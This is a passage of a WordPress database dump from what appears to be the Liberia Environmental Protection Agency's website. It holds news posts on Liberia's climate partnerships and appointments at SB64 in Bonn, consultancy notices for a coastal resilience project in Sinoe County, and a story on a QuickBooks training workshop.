-->\n<p>The discussions are expected to pave the way for stronger partnerships, increased technical support, and greater opportunities for financing environmental and climate-related initiatives in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At a time when developing nations face growing climate pressures, Liberia is actively seeking partnerships that can help strengthen national capacity, promote green development, and support the country\'s commitments under international environmental agreements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The opening day of talks was described as highly productive, with both sides reaffirming their shared commitment to advancing climate action and sustainable development. The engagement also provides an opportunity for Liberian officials to exchange experiences, identify best practices, and explore innovative solutions that can support the country\'s environmental agenda.</p>\n<!-- /wp:paragraph -->','Liberia Strengthens Global Climate Partnerships Through Vienna Talks with UNIDO','','inherit','closed','closed','','5964-revision-v1','','','2026-06-16 21:55:22','2026-06-16 21:55:22','',5964,'https://ekmsliberia.info/?p=5966',0,'revision','',0),(5967,38,'2026-06-16 22:04:07','2026-06-16 22:04:07','<!-- wp:paragraph -->\n<p>BONN, Germany, June 16, 2026 – Liberia\'s efforts to advance a sustainable and climate-resilient future gained significant international attention at SB64 as the Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel Urey Yarkpawolo, engaged in productive discussions with senior leaders of the UNFCCC\'s Sharm el-Sheikh Mitigation Ambition and Implementation Work Programme (MWP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The bilateral meeting with MWP Co-Chairs Angela Naneu Churie Kallhauge and Gao Xiang centered on opportunities to secure financial and institutional support for Liberia\'s Clean Smart Project, an ambitious initiative aimed at expanding renewable energy access and accelerating the country\'s transition toward a low-carbon economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The discussions highlighted Liberia\'s growing profile within international climate circles and the country\'s commitment to implementing practical solutions that address energy poverty, create economic opportunities, and contribute to global emissions reduction efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the meeting Tuesday, Dr. Yarkpawolo emphasized that Liberia remains committed to building partnerships that can unlock investment, innovation, and sustainable development opportunities for its people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the Clean Smart Project aligns with Liberia\'s broader vision of creating a cleaner, more productive, and resilient economy while contributing to international efforts to combat climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Kallhauge praised Liberia\'s vision and commitment to climate action, describing the Clean Smart Project as a promising initiative with the potential to deliver meaningful environmental and developmental impacts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She expressed strong interest in supporting the project\'s advancement and pledged to help facilitate introductions to potential funding partners and stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a notable show of confidence in Liberia\'s climate agenda, Ms. Kallhauge also expressed interest in visiting Liberia to engage directly with national stakeholders and explore opportunities for future collaboration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','International Interest Grows in Liberia\'s Clean Smart Project Following High-Level SB64 Engagement','','publish','open','open','','international-interest-grows-in-liberias-clean-smart-project-following-high-level-sb64-engagement','','','2026-06-16 22:04:11','2026-06-16 22:04:11','',0,'https://ekmsliberia.info/?p=5967',3,'post','',0),(5968,38,'2026-06-16 22:03:14','2026-06-16 22:03:14','','time news','','inherit','open','closed','','time-news','','','2026-06-16 22:03:14','2026-06-16 22:03:14','',5967,'https://ekmsliberia.info/wp-content/uploads/2026/06/time-news.jpg',0,'attachment','image/jpeg',0),(5969,38,'2026-06-16 22:04:07','2026-06-16 22:04:07','<!-- wp:paragraph -->\n<p>BONN, Germany, June 16, 2026 – Liberia\'s efforts to advance a sustainable and climate-resilient future gained significant international attention at SB64 as the Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel Urey Yarkpawolo, engaged in productive discussions with senior leaders of the UNFCCC\'s Sharm el-Sheikh Mitigation Ambition and Implementation Work Programme (MWP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The bilateral meeting with MWP Co-Chairs Angela Naneu Churie Kallhauge and Gao Xiang centered on opportunities to secure financial and institutional support for Liberia\'s Clean Smart Project, an ambitious initiative aimed at expanding renewable energy access and accelerating the country\'s transition toward a low-carbon economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The discussions highlighted Liberia\'s growing profile within international climate circles and the country\'s commitment to implementing practical solutions that address energy poverty, create economic opportunities, and contribute to global emissions reduction efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the meeting Tuesday, Dr. Yarkpawolo emphasized that Liberia remains committed to building partnerships that can unlock investment, innovation, and sustainable development opportunities for its people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the Clean Smart Project aligns with Liberia\'s broader vision of creating a cleaner, more productive, and resilient economy while contributing to international efforts to combat climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Kallhauge praised Liberia\'s vision and commitment to climate action, describing the Clean Smart Project as a promising initiative with the potential to deliver meaningful environmental and developmental impacts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She expressed strong interest in supporting the project\'s advancement and pledged to help facilitate introductions to potential funding partners and stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a notable show of confidence in Liberia\'s climate agenda, Ms. Kallhauge also expressed interest in visiting Liberia to engage directly with national stakeholders and explore opportunities for future collaboration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','International Interest Grows in Liberia\'s Clean Smart Project Following High-Level SB64 Engagement','','inherit','closed','closed','','5967-revision-v1','','','2026-06-16 22:04:07','2026-06-16 22:04:07','',5967,'https://ekmsliberia.info/?p=5969',0,'revision','',0),(5972,38,'2026-06-17 16:59:46','2026-06-17 16:59:46','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2:</strong> Innovation, technologies and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3:</strong> Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4:</strong> Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nClick to:','CONSULTANCY: National Climate Change and Early Warning Expert','','inherit','closed','closed','','5971-revision-v1','','','2026-06-17 16:59:46','2026-06-17 16:59:46','',5971,'https://ekmsliberia.info/?p=5972',0,'revision','',0),(5973,38,'2026-06-17 17:24:40','2026-06-17 17:24:40','','Final-National Climate Change for LMS on EWS Final-ToR 28.05.26','','inherit','open','closed','','final-national-climate-change-for-lms-on-ews-final-tor-28-05-26','','','2026-06-17 17:24:40','2026-06-17 17:24:40','',0,'https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Climate-Change-for-LMS-on-EWS-Final-ToR-28.05.26.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5974,38,'2026-06-17 17:25:42','2026-06-17 17:25:42','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2:</strong> Innovation, technologies and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3:</strong> Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4:</strong> Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Climate-Change-for-LMS-on-EWS-Final-ToR-28.05.26.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CONSULTANCY: National Climate Change and Early Warning Expert','','inherit','closed','closed','','5971-revision-v1','','','2026-06-17 17:25:42','2026-06-17 17:25:42','',5971,'https://ekmsliberia.info/?p=5974',0,'revision','',0),(5975,38,'2026-06-17 17:44:13','2026-06-17 17:44:13','<!-- wp:paragraph -->\n<p>BONN, Germany, June 17, 2026 — Liberia has secured a seat on the Steering Committee of the National Adaptation Plans (NAP) Global Network for the 2026–2028 term, marking a significant milestone in the country\'s growing engagement in international climate governance and adaptation planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing Liberia on the Steering Committee will be Arthur R.M. Becker, Director of the Department of Multilateral Environmental Agreements at the Environmental Protection Agency of Liberia and National Adaptation Plan National Focal Point. He will serve alongside representatives from the Maldives, Mexico, the Central African Republic, Canada, Saint Lucia, Albania, Germany, the United Kingdom, and Vietnam.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The member countries represent a diverse mix of Least Developed Countries, Small Island Developing States, developing nations, and developed countries, reflecting the Network\'s commitment to inclusive and collaborative climate adaptation efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As a governing body of the NAP Global Network, the Steering Committee is responsible for providing strategic leadership and guidance aimed at advancing climate adaptation planning worldwide. The committee will help shape the Network\'s strategic direction and priorities while supporting efforts to mobilize climate finance for adaptation interventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The committee will oversee the implementation of programs and activities under the NAP Global Network and work to strengthen collaboration among member countries and development partners. It will also promote the exchange of knowledge, technical expertise, and best practices in climate adaptation planning while supporting national efforts to build resilience against the growing impacts of climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to providing strategic oversight, Steering Committee members are expected to serve as ambassadors for the Network by communicating its goals, priorities, and activities to key stakeholders across regions and sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia\'s participation on the Steering Committee is expected to provide the country with a stronger platform to contribute to global climate adaptation discussions while sharing its own experiences and learning from other nations facing similar climate-related challenges.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The inaugural Steering Committee meeting for 2026 is scheduled to take place virtually on Friday, June 19, 2026. The meeting will bring together representatives of member countries and partner organizations to discuss strategic priorities, ongoing initiatives, and future opportunities for collaboration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia\'s appointment underscores the country\'s increasing leadership in climate action and its commitment to strengthening national adaptation planning as part of broader efforts to promote sustainable development and climate resilience.</p>\n<!-- /wp:paragraph -->','Liberia Secures Seat on NAP Global Network Steering Committee for 2026–2028','','publish','open','open','','liberia-secures-seat-on-nap-global-network-steering-committee-for-2026-2028','','','2026-06-17 17:44:17','2026-06-17 17:44:17','',0,'https://ekmsliberia.info/?p=5975',2,'post','',0),(5976,38,'2026-06-17 17:43:29','2026-06-17 17:43:29','','today newssss','','inherit','open','closed','','today-newssss','','','2026-06-17 17:43:29','2026-06-17 17:43:29','',5975,'https://ekmsliberia.info/wp-content/uploads/2026/06/today-newssss.jpeg',0,'attachment','image/jpeg',0),(5977,38,'2026-06-17 17:44:13','2026-06-17 17:44:13','<!-- wp:paragraph -->\n<p>BONN, Germany, June 17, 2026 — Liberia has secured a seat on the Steering Committee of the National Adaptation Plans (NAP) Global Network for the 2026–2028 term, marking a significant milestone in the country\'s growing engagement in international climate governance and adaptation planning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing Liberia on the Steering Committee will be Arthur R.M. Becker, Director of the Department of Multilateral Environmental Agreements at the Environmental Protection Agency of Liberia and National Adaptation Plan National Focal Point. He will serve alongside representatives from the Maldives, Mexico, the Central African Republic, Canada, Saint Lucia, Albania, Germany, the United Kingdom, and Vietnam.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The member countries represent a diverse mix of Least Developed Countries, Small Island Developing States, developing nations, and developed countries, reflecting the Network\'s commitment to inclusive and collaborative climate adaptation efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As a governing body of the NAP Global Network, the Steering Committee is responsible for providing strategic leadership and guidance aimed at advancing climate adaptation planning worldwide. The committee will help shape the Network\'s strategic direction and priorities while supporting efforts to mobilize climate finance for adaptation interventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The committee will oversee the implementation of programs and activities under the NAP Global Network and work to strengthen collaboration among member countries and development partners. It will also promote the exchange of knowledge, technical expertise, and best practices in climate adaptation planning while supporting national efforts to build resilience against the growing impacts of climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to providing strategic oversight, Steering Committee members are expected to serve as ambassadors for the Network by communicating its goals, priorities, and activities to key stakeholders across regions and sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia\'s participation on the Steering Committee is expected to provide the country with a stronger platform to contribute to global climate adaptation discussions while sharing its own experiences and learning from other nations facing similar climate-related challenges.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The inaugural Steering Committee meeting for 2026 is scheduled to take place virtually on Friday, June 19, 2026. The meeting will bring together representatives of member countries and partner organizations to discuss strategic priorities, ongoing initiatives, and future opportunities for collaboration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia\'s appointment underscores the country\'s increasing leadership in climate action and its commitment to strengthening national adaptation planning as part of broader efforts to promote sustainable development and climate resilience.</p>\n<!-- /wp:paragraph -->','Liberia Secures Seat on NAP Global Network Steering Committee for 2026–2028','','inherit','closed','closed','','5975-revision-v1','','','2026-06-17 17:44:13','2026-06-17 17:44:13','',5975,'https://ekmsliberia.info/?p=5977',0,'revision','',0),(5978,38,'2026-06-17 18:11:55','2026-06-17 18:11:55','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Consultant-for-Community-Based-Coastal-Ecosystem-Monitoring-28.05.2026.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CONSULTANCY: National Community Monitoring Expert','','publish','closed','closed','','consultancy-national-community-monitoring-expert','','','2026-06-17 18:11:55','2026-06-17 18:11:55','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5978',2,'ekms_bulletin','',0),(5979,38,'2026-06-17 18:03:48','2026-06-17 18:03:48','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems.','CONSULTANCY: National Community Monitoring Expert','','inherit','closed','closed','','5978-revision-v1','','','2026-06-17 18:03:48','2026-06-17 18:03:48','',5978,'https://ekmsliberia.info/?p=5979',0,'revision','',0),(5980,38,'2026-06-17 18:08:26','2026-06-17 18:08:26','','Final-National Consultant for Community-Based Coastal Ecosystem Monitoring-28.05.2026','','inherit','open','closed','','final-national-consultant-for-community-based-coastal-ecosystem-monitoring-28-05-2026','','','2026-06-17 18:08:26','2026-06-17 18:08:26','',0,'https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Consultant-for-Community-Based-Coastal-Ecosystem-Monitoring-28.05.2026.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5981,38,'2026-06-17 18:11:55','2026-06-17 18:11:55','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1</strong>: Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2</strong>: Innovation, technologies and climate information introduced for coastal adaptation planning.\r\n\r\n<strong>Component 3</strong>: Introducing Engineered Hybrid Adaptation Solutions, and;\r\n\r\n<strong>Component 4</strong>: Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance.\r\n\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Consultant-for-Community-Based-Coastal-Ecosystem-Monitoring-28.05.2026.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CONSULTANCY: National Community Monitoring Expert','','inherit','closed','closed','','5978-revision-v1','','','2026-06-17 18:11:55','2026-06-17 18:11:55','',5978,'https://ekmsliberia.info/?p=5981',0,'revision','',0),(5982,38,'2026-06-18 17:07:13','2026-06-18 17:07:13','<strong>BACKGROUND </strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n&nbsp;\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Sea-and-River-Defense-management-Spaecialist.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Climate Risk and Sea and River Defense Management Specialist','','publish','closed','closed','','national-climate-risk-and-sea-and-river-defense-management-specialist','','','2026-06-18 17:07:13','2026-06-18 17:07:13','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5982',1,'ekms_bulletin','',0),(5983,38,'2026-06-18 16:31:39','2026-06-18 16:31:39','<strong>BACKGROUND </strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n&nbsp;\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\n&nbsp;\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid\r\n\r\nClick to:','National Climate Risk and Sea and River Defense Management Specialist','','inherit','closed','closed','','5982-revision-v1','','','2026-06-18 16:31:39','2026-06-18 16:31:39','',5982,'https://ekmsliberia.info/?p=5983',0,'revision','',0),(5984,38,'2026-06-18 17:04:34','2026-06-18 17:04:34','','Final-National Sea and River Defense management Spaecialist','','inherit','open','closed','','final-national-sea-and-river-defense-management-spaecialist','','','2026-06-18 17:04:34','2026-06-18 17:04:34','',0,'https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Sea-and-River-Defense-management-Spaecialist.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5985,38,'2026-06-18 17:07:13','2026-06-18 17:07:13','<strong>BACKGROUND </strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n&nbsp;\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Final-National-Sea-and-River-Defense-management-Spaecialist.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Climate Risk and Sea and River Defense Management Specialist','','inherit','closed','closed','','5982-revision-v1','','','2026-06-18 17:07:13','2026-06-18 17:07:13','',5982,'https://ekmsliberia.info/?p=5985',0,'revision','',0),(5986,38,'2026-06-18 18:33:46','2026-06-18 18:33:46','<!-- wp:paragraph -->\n<p>Buchanan, Grand Bassa County – June 2026 – The Environmental Protection Agency (EPA) of Liberia has launched a four-day intensive QuickBooks Training Workshop aimed at strengthening financial accountability, transparency, and operational efficiency across the institution and its various donor-funded projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training, currently underway in Buchanan City, Grand Bassa County, brings together finance officers, accountants, project administrators, approving officials, and key personnel from different departments and projects of the Agency.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop is designed to equip participants with practical knowledge and skills in digital financial management, enabling them to accurately record transactions, monitor budgets, track expenditures, generate financial reports, and ensure compliance with both national financial regulations and donor requirements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative forms part of the EPA\'s broader efforts to modernize its financial management systems and promote responsible stewardship of public and development partner resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on behalf of the Executive Director of the Environmental Protection Agency of Liberia, Deputy Executive Director for Administration, Mr. Anthony S. Kollie, described the workshop as a timely and strategic investment in the Agency\'s institutional capacity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kollie emphasized that strong financial management systems are critical to achieving the 